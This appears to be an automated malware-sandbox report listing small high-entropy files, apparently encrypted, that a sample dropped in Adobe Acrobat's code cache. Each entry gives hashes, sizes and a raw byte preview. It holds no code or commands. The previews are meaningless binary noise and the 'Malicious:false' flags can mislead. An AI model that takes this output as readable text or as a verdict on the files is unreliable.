                Preview:.X.]@...n.(.E"=..bUx..]l..7.....|..o....j...:..Oz$.!Z....u.K!..o..D.0..L6.]1.r..}..;^WA..).K7.c.....:I.L]L9/=C...f..Q.0..."....f...!3Z.JU..%..Y.>5..*:-.i.>N.D.O.g....n..!!UR_.-..^:.$-0...<.....)..i*.._196....q.<..3....@.h.>....D..d*.K+.,..1................L...P.%.Ef1e..(.z..MV~^d...r..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):456
                Entropy (8bit):7.510190838908946
                Encrypted:false
                SSDEEP:12:6oDMVHTi+NvLVbewKKyz2BBvarycFYiKiIOD2VJNAWnM+i+9BVzd:6o2cwyyKrGixD2HNAX+i+9BVR
                MD5:9BF2471C7E324C6E9BF8B717C872DE68
                SHA1:01CBDBE9C77F89F17CF41FA308086FECA7CCA467
                SHA-256:23BDD034C76A4F4F36411413C08C318205A3FE287F379BAE810D9D51CEB4B8CE
                SHA-512:2DECD78E679611E1D0BC9809D381BD4430B87245CF168B8DF2AD8F56EDEEBDBE6618C4DBEF714D97F2381CD9A6E673AEC0D402E3DD61E96C354281A86EBBF630
                Malicious:false
                Preview:.'7........x..K... \...i.S/.F...v`rs.u. Z!3u..C*.......vKVc4....<....Y}.p.+...p...o.7...[Yb..i...~....wSY<....GA.z/.7..3.&........q......fH..:O8.....'T}..2B.....:.jS..tn..PZ.....P.tp.Ma..t......[..^n.s-d.+.#...r).{A.....,d...Q.<..a....C.h.=...2]....z...z.....f.B.......y|.O....v..k..W..3.o...N:...'.....zs..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):459
                Entropy (8bit):7.550870953647569
                Encrypted:false
                SSDEEP:12:hO9CwV0jg9Y1ZTO0dnggkRXqFXehIySD2VJNAWnM+i+9BVzd:89Cy0jg9SJOkggAymjSD2HNAX+i+9BVR
                MD5:A3A330C8F13B81539C10A5C64CED95FD
                SHA1:2CB9FC825DC8E26BC81CC26C105D6923A061F0D4
                SHA-256:28F184074D421F5BF2BA60901A87076146D47D061453140CEA020D4BAD0781D1
                SHA-512:BE55DB637E8012171D38D47F4EFEDC1F9B1B7BDD2661365600FA659CF935CE0058B04A1F86B19B3F8DCDA3265CBAE8E8C0FB348D0C5E9EB315D2400B07A0456A
                Malicious:false
                Preview:...).:+.(g.(.....D.$^`..y...Pne}..i...,.#.x...n.d.F..lh..f.&e.ll..Q.......;...,z.O..D...w....-.Y....1..o.._..c.=b...k. m.0(E..e...|q....12d0.B.E.k+!.k].0...q..`=.=.m.Kx.w....H....i.*.X...+...Lxtx...n,...^m.'-`..6.6R.\..Snp.'s2!6..+.Q.<..a....C.h.=...2...p..Qv?oUF4..[I ./.............S<p'....~x..Ce`@.`{..6...Mm./7s..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):471
                Entropy (8bit):7.6128102678393565
                Encrypted:false
                SSDEEP:12:MJnxNigLcZxHhMTbM+wufxJJidOh7O+HD2VJNAWnM+i+9BVzd:MJegLcZITbbxDjhi+HD2HNAX+i+9BVR
                MD5:2AA3E73B3B53A6C61FB71377A86F8CD7
                SHA1:B438DBA8A17D2BE138267202AE341381F79362A1
                SHA-256:434893DC6D32F46B0994F352B762EDC095ADA0174D31CC150A2ABF3C833BFE2F
                SHA-512:6E143451A1E4B4BF76CCF8A7457C5E4FE051CABD8DAA6AD1D6527EB089DFFFD43A60B55A41C232C171B232B4316C703A61A951F7DDE1A48DBCC60D012ADD7055
                Malicious:false
                Preview:)...p.@\......;T..../....&..RM.E..$...:..!.p..nK3.T.......0.i.K(....4Rm~.f....*.)..S>...g2{.Z./...7*....f....o....P]....i......{&& O..B.....l.W.....U.S..-...`Sn.G.._i....._=R.=....|.u...!q..$I......Q.&...4bG.>.^m.s-4..6K7...v...Fm...gwF..SE.q.<..3....@.h.>...[...^....... ...4w.T..+....>.[{.I.8.:....6}..W.."r..AR.( 5.r..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):460
                Entropy (8bit):7.509412513216766
                Encrypted:false
                SSDEEP:12:BDZ3WldxPBIMiRqO36O6bV9qD2VJNAWnM+i+9BVzd:p+dxJIMiRhk9qD2HNAX+i+9BVR
                MD5:96EE0ABA2674660FCF623A90264A9C72
                SHA1:94EF4E2AFDC6090217B399B3918CC07F18BF693B
                SHA-256:37C2D094C662C15AA10E700301B07FD1ACC6CA250648D28C602F4211383B69CD
                SHA-512:E4846C893FBB98E70F1026A24627539A4FE8204E0958F4B1DFC5F65376CDCE6CB3C2AADA74F234DBE33C4CB8BB4B0BB687E0CAAF5DFD24B8C9566D14FDD6FF7D
                Malicious:false
                Preview:.jmO..m.K..6>..P?........M..f.l....;.+}.E2V...SgImkt.....D.....5.3udvM........;...*R:e{.].0..xTG...4.-t2{.o.6..l'..(......'8......8...D.4o......!.O..\qV.3.^m......_-(...............<....N...C....8...^k.&-9... ...!wJ...J..*vX.Y..G.Q.<P.3....C.h.=...ZN...[^Dq.,...m..L..sD.&DJQx..<.~..+./..H....j:...(....p....q..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):456
                Entropy (8bit):7.520703969434104
                Encrypted:false
                SSDEEP:12:k3RLsnyhWae9zhs/IjQVnEidHD2VJNAWnM+i+9BVzd:gWHheIjQxEoD2HNAX+i+9BVR
                MD5:A0B6EB4AC3C3EE7A613DE39FD0CA6094
                SHA1:30933AFB4E48CC4E332955E184A77E39261F320D
                SHA-256:EE050F4030DDEE49F75EF61C6D69A2A07895D2A4DEA93846995037CA4A8CC7F9
                SHA-512:5AA850C25AFDF90B38F3693A332AC666DB8DFD8B525198E9E4AA3D883C0C93F97F8AFF35D2B2C7CFCABA8E20396320FB6518443B20065F64AAC6E170DB98ADDA
                Malicious:false
                Preview:U.H..^?.I...y..~U...GJN.=-.u...A....c.7H\....g....Y.a:.n.....1B".6...v.2I.;....>. "<...X7Z....d.*..,...p>z.GI.......@j.>.....z.....G...}s...<9.a..c..<..$.K.+..zz&0....C=..sc5.cyr..yO.*....../S.^g.#-c..6L.....K..r..X.Y<...q.<..3....@.h.>.....G..#......w..aDH.-....+..e......VHz./..>6.. ..^f&...n.08r..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):436
                Entropy (8bit):7.524128133274383
                Encrypted:false
                SSDEEP:12:ZvjPpJrXpcRM5iF8+t26htA4vSD2VJNAWnM+i+9BVzd:Z7Pf5cRM5ut26/6D2HNAX+i+9BVR
                MD5:2DC1230D3AA064B837B58B1E4ED746CE
                SHA1:1B1FA2C2DF4E3BC756BAAB653CE06FD64D08C9A6
                SHA-256:5B6E529E06677BFFADAA3D10F5E594D5A355FC83CDD61BBC22ABBD0C7E1B1F3C
                SHA-512:3F2033F486FD56F6FF042CC70A5112676D0BCA885738D7C5C845ABFCC8C045FF10C0EBE952CDCE49910EEF64346968547C69C19275C2101F4BF31CFBD52D73CB
                Malicious:false
                Preview:Lz...,..Xq$..).P....pP.7........a.n).*..{.*...:L.XC.1..4...S...206...\@v.....C6.N.3..6..k......Q".....!.p.m.6i.Pv.5u....M....h..l..4.#....9`.._)A..S.>..L....V...;...D.j.._.rY.a..^=...7-.......\...c3...186....q.<..3....@.h.>......oR.!....2.iQ......}x-..Z.....'.@...K....4+s...`.R......W.r..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):465
                Entropy (8bit):7.566314677383806
                Encrypted:false
                SSDEEP:12:bxzAZoNZbvryf23IlsgIxBFMD2VJNAWnM+i+9BVzd:bxzxNZbvWYYsgIxBFMD2HNAX+i+9BVR
                MD5:42E632B18DEE7607C9BCFC0F305DB95D
                SHA1:7F20DEAB1C6A832659274413EE78B820DFB11135
                SHA-256:B2574ADE40D6CC51EFA652C592E7334384F9EEB2D3ED55094E65A0C48E28EE04
                SHA-512:87BF187FE422FD36666679E29CE32A5665CBC18B1C0B87EAB953E82B49C958747FF36AECC511CFC515062F02FC9E8B295A121243CD8BEF01B70D8A3F26FAB8F0
                Malicious:false
                Preview:..at*...6..9.aC..?3Z3<.!q.?&>.$.;.......h...+..0&..=.n......Y.F....2.L....(...Vu..X~.U....S..|.,...P...8e....c.!.<.qY...<....S..HJ...~ajF.&h..9......W7..T 7\..w...I.fn......%..1...VQx..+.T..Z7...^i.t-4.+.4......)..jp..K# ...w.Ss<!.3.A..C.h.=...2?..m.9}.$Q...[."...e..~........_.<..8m..X.<,N.lFH..\/...D.Nu..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):460
                Entropy (8bit):7.569069251206763
                Encrypted:false
                SSDEEP:12:gPWURYBAvO5ZQ1CMmd86HSVVCa9iabTFzDzJMD2VJNAWnM+i+9BVzd:gP5tWeO86yVVXb1eD2HNAX+i+9BVR
                MD5:5A457520287D7B1078547944365CE415
                SHA1:BB9D22A2A473A5543D9FB541E41ABE62837F3A43
                SHA-256:B6F52B5803FF566486256E938157F46233480630AC14C0202A8A7626887DEB75
                SHA-512:65470614780F7DABE0F5E58E092973EA465A1B23E2D42D15584BB137A352B8FC1696F8EBAD71D6F6DFCB406BBC68619826C58CB1F5687C9FD9C105F98E9074AB
                Malicious:false
                Preview:..+.9.E7.3..i&....9j.=^..@EO7`.9....>....jb.Y.l.{...|z>.j..rDL....QX...9...{1^..P....at....c.'~.u..oA.......y...KQ...T.(..F55.YO. ....RG.`aV.m....1..Z.5.0t...L&.....{E9@..}..$h(l.F-p....3.Wg.w.9..Se......._.Vq.3-..I.....s.E....B3!6..+.Q.<..a....C.h.=...2..\[Y.........;;..hD.k:."..x.6(..O...[Xy]MK..3F).....a.#`uC.....s..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):454
                Entropy (8bit):7.594604979615388
                Encrypted:false
                SSDEEP:12:zcpxHNS1uuQzOvYuq9Mio8EZOaSD2VJNAWnM+i+9BVzd:zcTtDuQzOQuNL8EsDD2HNAX+i+9BVR
                MD5:CF21851CA86B162CE00E36646AC1A7DC
                SHA1:BC99D460F083982275E07FE112ADAD5115530F1A
                SHA-256:D7BDACC1896CAB9C5359774918F0CDB66441D711A8C5281B1B079F018D212B67
                SHA-512:99320F42B2DF3260971D3AC92D5B6DB54DBE10166E748DB9B2CA67C2E8C97341E31A26C43B7DAA61BB3CAFAF3D434DA54DD10973DD226A75696A340802F893EA
                Malicious:false
                Preview:..D|9...-ZQ~......'...|.TB..D.Z..I..h.s{.....k).....@2`.|....... -.[...<Q.Z$...`..=j.O.........e.d.(Q. .N.X{.*L..wCvs...5.G....{'.g..R9g./....F[.."a.1..}8&.N>s?.t..k?;H.{....m2]@r.#..j.'.f..A..m.*...^9. -`.A6......[.^?..CXuT..Y.Q.n..3....C.k.=...h.4...c..'...B.l*iO.T.x^....M......B........k1'.r....#.p..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):453
                Entropy (8bit):7.551270739185913
                Encrypted:false
                SSDEEP:12:5HjeXMgkqhUbQXXcvG9iGqeHlgD2VJNAWnM+i+9BVzd:paXJfsUTJ+D2HNAX+i+9BVR
                MD5:EDA8DC143A7A66CE5B10D242E71B24D6
                SHA1:E6AD322662F6A4FC6AE91E8D33DA91D468550AA1
                SHA-256:82287BE929D8FE3258F045A9B0A7833A98506FF49C7DCFD93DA5008A2D11FBA0
                SHA-512:DE8F2CE6053C4F388BAA2937EFFCEEE3AF88CA0939DA5D1FABDC489061BA27D34BDFE4F51AADE7B80F2EDF30CD5467595E760A7843E04D018C32AC1F0E05EC19
                Malicious:false
                Preview:....%kg#+..e/I..4.JR.t..;..Vm.+..:1&..,..k6G.2.]S|.A.......u..Q..qV.#8;.?..I..Iz....*....o.t.RVh.,....U7q'.+...K.(.:.0.%....\6d.a.^...d.6.@| Z)..}..7T......#e..Nh ......XH....i{...k..3..Au....B...^9.#-d.+.!...C..E...%.0k..G.Q.<..3....C.h.=...=........F..Rd....S.,N.Y.z+X..X'....F1.PjAg9Bk<.8e.J.W....o..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):464
                Entropy (8bit):7.585193718120067
                Encrypted:false
                SSDEEP:12:tLXRyJ+hx8Ear7BvItpcFFhTZ9GD2VJNAWnM+i+9BVzd:tzQIpApIu9GD2HNAX+i+9BVR
                MD5:1B04EFCB3D0C283E7558E335B739062A
                SHA1:FF781400BB37ADF8A61EF30B395625609530EAE3
                SHA-256:F0F2CFCE16A846AF6E7CC9BE7C66AC45758BCFBF6207579F47FE00D15EEDC889
                SHA-512:56D6DE83766DCD125209A96A49F44461DD671DE077A859DCC5B847078A10CAC3C59457ABECA9611FEE8D68814120B781AA473B76D70BCB357667CC333379DB6E
                Malicious:false
                Preview:.0..Ee .N..m5S......B.gn ....B~yaH..s..'...b.Vy{.9...-m%....*.cf.P}.Na...5DmJM._..gT....B.....5`...1(eh .J$u.p..u..7..N0u3.F.t.....x....<.r....m....X\IK...O.O.o.k...%\...b....#.G.]..l.&.w..D..b.}..4/..d~.^g.....,.#....u...3..J?-_.E.Q.<..a....C.h.=...2[..o=$...c.D..6.~CX#.:x..ru.J.......I>...U..^..5.%..5.|......./Zs..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):452
                Entropy (8bit):7.51903293268145
                Encrypted:false
                SSDEEP:12:RovJKca65b5+7yeHnPD2VJNAWnM+i+9BVzd:ivJKcaos7vPD2HNAX+i+9BVR
                MD5:E6C9F36A9A60D913A8B9E71D746914FC
                SHA1:3750A71B759837450821A5F1FA9B0FED483663A1
                SHA-256:EC743696C8714F8F9AD6AC41EBE3095173A813382FD4C8775A23565CA3FCA886
                SHA-512:4B475766AB2039C58E9E6EE609645FF249FF4EF129633A56589C98370AD3CE075119372B859410D36EB54CCA45C796A126901A0F4132E516A3A1313A8B9B0C28
                Malicious:false
                Preview:.q..m?.i....|.!Y.....D8.....R1....y.p..C..C.c[...8...,Y..........Or...|.....g......c..A.m..F.u.=...%Z\#..........b.P....r.%.\.`...i...S...51...t.x.....\>.u.t?.&..@...]g...w..?...h}.8f+."....S...e.g.^:.'-9...<....&..k..%..i..G...<..3....@.h...`..D..Q........EL"e..s..b4...3...=......".S.....f..,.($..n..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\e0924daf8f4398dc_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):459
                Entropy (8bit):7.520026243667006
                Encrypted:false
                SSDEEP:12:mReX4aQEcYVyziTiTd0X/D2VJNAWnM+i+9BVzd:mNxN0X/D2HNAX+i+9BVR
                MD5:0B6CD11E2B08900E3C38830613326FBC
                SHA1:DF08FAD495D48054695009763D9781A932EF7C50
                SHA-256:A5D6B66349EF2E8DA0F5F2CC2196FD9DEB397696C68D7F4CF147C43BC468F184
                SHA-512:770484F86DAFF9B6408E774D2EC4FCCC2ED7F380D860A62EA381E0508F69409E2E6460F925F4C9BA0D60CFC4BC89EC79D8DF13A7ADB680E0A3C31B41A54A26AE
                Malicious:false
                Preview:.......IrS.-..it.&zn.....p~x.es......6....C....C...0IfSV)....'2..Yu.2Oe.YD..d..a............F0X..,...+g.+.J=.cs4....Z..#.....^L.jD._!?...a5./.%...m:.TP.$...d...,pE.....i.j...g7./...3......g..^...d.%.^o.)-3..6I7.!..1.j8..._d.6.SE.q.<..3....@.h.>...Qsj..{2......|.[...."v...SE8..........\6=.4.P.EL.6a.\..S..`..r..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):451
                Entropy (8bit):7.545947213236705
                Encrypted:false
                SSDEEP:12:LbKn82sMIeUCeW+JTaO76NAgJBOSCYXF7LrHD2VJNAWnM+i+9BVzd:nKhdZUCeVJWBNAgJntJPHD2HNAX+i+99
                MD5:8AFBF6D3D005EFD4EE6A0D8B664E60DB
                SHA1:8EF47D14C9E04DE069AA526BEBA15D86B1F03FB2
                SHA-256:7B195E687525B5925251EE155606218CDECAE515B8D605D78F9DDD8CDCBB29AE
                SHA-512:A2ABC5C8E7784B608DE1CB76943B2549F1A9F63A7AEE072213C149F2B2DF46251A55C64EAA085C4E40B5328EF1CE946E4F350C064F1BCE22DBB70E9D3200D3D5
                Malicious:false
                Preview:....e..Z6...bZX...R.\..{.?.p=e.B...z|...`. .m.,g.......N#..}I..F..`P....M....F".T-..=?6.8..9.[..a/.....o..u.?0D..Z.P..x..N...'Sw.....1A..d.....J.m...U>].u1...T....5.M...a.1.?.-DKn...8.T.....^.S.l..^o.s,.=..I..I...A8...;..r..GTQ.<..0....C.ht....z1.......c..+A..".p.I........`.*9b.b....(..b...w........m..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):458
                Entropy (8bit):7.556568840722661
                Encrypted:false
                SSDEEP:12:3lfGVlbd6yZRRwVb2NXMwAZ3paCD2VJNAWnM+i+9BVzd:VybdZdw2cwAZZ5D2HNAX+i+9BVR
                MD5:EDD629E92ABCDC082D730627F811FA5E
                SHA1:028CEDB18F94CAB74C50881BABA67AB792F4D33C
                SHA-256:B8FDC1092C03FF5ED7F7B306E11A235EA12FEB7ADE30C72E6A5CBB7FEB0AC201
                SHA-512:364CBBE693284873D50685E61344751BC2865EDC3F8D0EE5646902F2260414A0472460C9FAD0A0E8C84F51DC1D002540E8EA2BCDFDC8E48498E58DD44C0F8490
                Malicious:false
                Preview:e.cpN.+.q@..y=m..'.....P...).TZ......6i6i.t..B.+@....FL.Ke..[y.F...Y.l<..3}....eO...g>i(..Qo..(..z.i..g..L...s[.?.....fY^.18..O.$8.....>C.dEDaU..1.....l..3.y..4..Z.....-..C..>,.{.8.!...r}.n 5.} .RT...^k.q-1.F.<...C.......S196....q.<..3....@.h.>...$.[.#....i..,..aE..`.!.j:R...{7..3F.bG.~9.,.YZ.......4Hh..@r..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):472
                Entropy (8bit):7.609155989297476
                Encrypted:false
                SSDEEP:12:RnpSa4WkUOqUrCy3JkQYVRoNFGM2eD2VJNAWnM+i+9BVzd:L0WQZrYVaAeD2HNAX+i+9BVR
                MD5:2E22035712EE1692F8C3B814912BAAF6
                SHA1:7BFFBF6439A0608E387C23F8297AC33914C50B71
                SHA-256:E1FE1BC7291D37F9A7D44C6DAA84D1282EB738E5B8E9D78987765B86B6B94D10
                SHA-512:397FD2890AE82E6B920CFDD9E9B5F55A00E40A1B2B422247DDB9D67362792334E5BFCB9DA400A15ED5A71076CF8C2DDF34C795E9278B05D47500D91E1EF9D416
                Malicious:false
                Preview:6=}.mvI......y)$...U........f..}..... bU..4.......:..q.X*<......._.hH..LZ..YIE......#..M.!...c.*K}.W.>o...<..0....B.p...........;)7.n|........ .....\..=/<...^...X]zUa.l...5..ZK....FI..8b.~n.41.B.R......].hgS.....^f.$-0..6.7.!.............a.w.S.<!.3.A..C.h.=...2?.M..}6s`....D...w..N...9Z-...<AF...4O....K..`.L.T*....&.|S...u..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):459
                Entropy (8bit):7.502708043960772
                Encrypted:false
                SSDEEP:12:rhJqEtOt2ohaLs5acF0lN4ZD2VJNAWnM+i+9BVzd:rLt6aLs5OvmD2HNAX+i+9BVR
                MD5:79D621B88F789C9458AD51B8BEC3CF86
                SHA1:7BA60865513E8892DCF1ECCCBC3A24FDDCBE706E
                SHA-256:BD6036AF4B38A035B6DA6F8A953C5E198C0D1ACCECF6C6F555303F1656B26EB1
                SHA-512:40578020132F3C1759094079A60A1C2297494DA22701F05F6C19060C0ADF1D1F1D70C14C25BEE9FD141D42D0275EB28692DCC3882470BEC8CB0508446E827306
                Malicious:false
                Preview:.)..n. f.....8..A...LhZ..k..r5..97.h....h.p.T7i...SV...N..E..E.J......W.S.lg..2...!..N.C2.~.Z%....r.a..B.T.?z..]..U..1..... P/..K.;C.B.@;.....N......6P.a.....cvc.]..|...K...*.^P?.p..]......Cw........&~..^f.'-0.@. ....!.U.;....*d...Q.<..a....C.h.=...2.....z.eiI)...f........LG....|rd%d....w..Z......5.h...K.:.t.s..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):452
                Entropy (8bit):7.556958824418325
                Encrypted:false
                SSDEEP:12:eQiE7mDnPVrrdbyfEudldOFCvA1zgPDVAyzzvD2VJNAWnM+i+9BVzd:OhLPVrrcfldSowzGDmyzzvD2HNAX+i+j
                MD5:B275F7FE9DD80649B3234559AA766EEC
                SHA1:9F2D10C411EF2DE9A252FF8C47B7D3C17D46CCE0
                SHA-256:9C792279F6B5559064C6F42AB02E1BD701784DFDB4B2CAF985365718F6B77F46
                SHA-512:75BC32C90C70EE9A8E17184CDD34221CE53D6AB933EEC6F9EC26714FD5D1568250B43BABE786D739E95D3A02204E96F84229A246052D1EA090D83C28080ECDED
                Malicious:false
                Preview:...@..9.O..`."Fny.5*.Z...{...y.$..?.B..Uj.W..I..D.Kh"L.0*.....'..........aSRg..@...u.0....$..3.....uDo.f.....(@{....J...f......>}.[.TL.o.c:...N..T...7......;..f.,|j......G..iPz@.U...z.Pm.{..^;.!-6.@6.....s.t.......&Fu..E.q.<..3....@.h.>....!l .]r.LW..S....h.t.!L........m..\.W..d.m..Ca<...E......6.^.r..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):458
                Entropy (8bit):7.576577581817393
                Encrypted:false
                SSDEEP:12:9yDGpGMoce5Nw2hLZn/EDQ/GBHD2VJNAWnM+i+9BVzd:UDG8MXGVGc/GhD2HNAX+i+9BVR
                MD5:486D4DFC03E42815A1C5E78C43F3EB82
                SHA1:8CD1B6735467A4A498B66511FE083DBBC82DEC16
                SHA-256:F86C0670C5CB6167535DA558CCC2D9BE7060B45C2FF2D6A4E0814ED046490FB8
                SHA-512:7A17FEC39652733E27A50B20D172A8440C68AD62D8BC93ADD5C2AE15A06574651AF5F5BA9A507D6E240BBCFA2AB4F4AA6A7835F3D01BE3F18C20A5545D817A8B
                Malicious:false
                Preview:.=L&...%...c.!:l...H...7v.N.^k[.....u...C..E.].*8..E?j..,......D...u_E.'.:.....]&l@.e.m.j..r..........31J.]h...S._Gc.v...W.M{.....k..^......oZ.,..$/....8.m..(.....R..Pb..*....F.M...K8.`....?.h=..?.^;.......1....%z......%?)...Y.Q.n..3....C.k.=.V.9c_.v..........;...!.6.5..6.1IB...cL?..ytMB.@...[.Q.y.+.#...&p..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):476
                Entropy (8bit):7.5809475575205925
                Encrypted:false
                SSDEEP:12:YJ/0+1mZsXP6dbKLVAZOfNAID2VJNAWnM+i+9BVzd:YJ/0hs4KLV8WAID2HNAX+i+9BVR
                MD5:99FED1C67E65B944C051F4A1EB96CDF9
                SHA1:5115E86B3C0EEF7004DD42E2A046CBE327A94053
                SHA-256:74C0BCDA42A794277F319C0600CEDEC4A017E822967AADC49F0697A4A0E0F405
                SHA-512:8FC6195A82BDAF10801C649A66B15136B9084FF67B674971BC62CF35B9C18E182F80E17D260BA5521BCF0831DFBF3557F433B09252D02D5FDAC6D874B90836DF
                Malicious:false
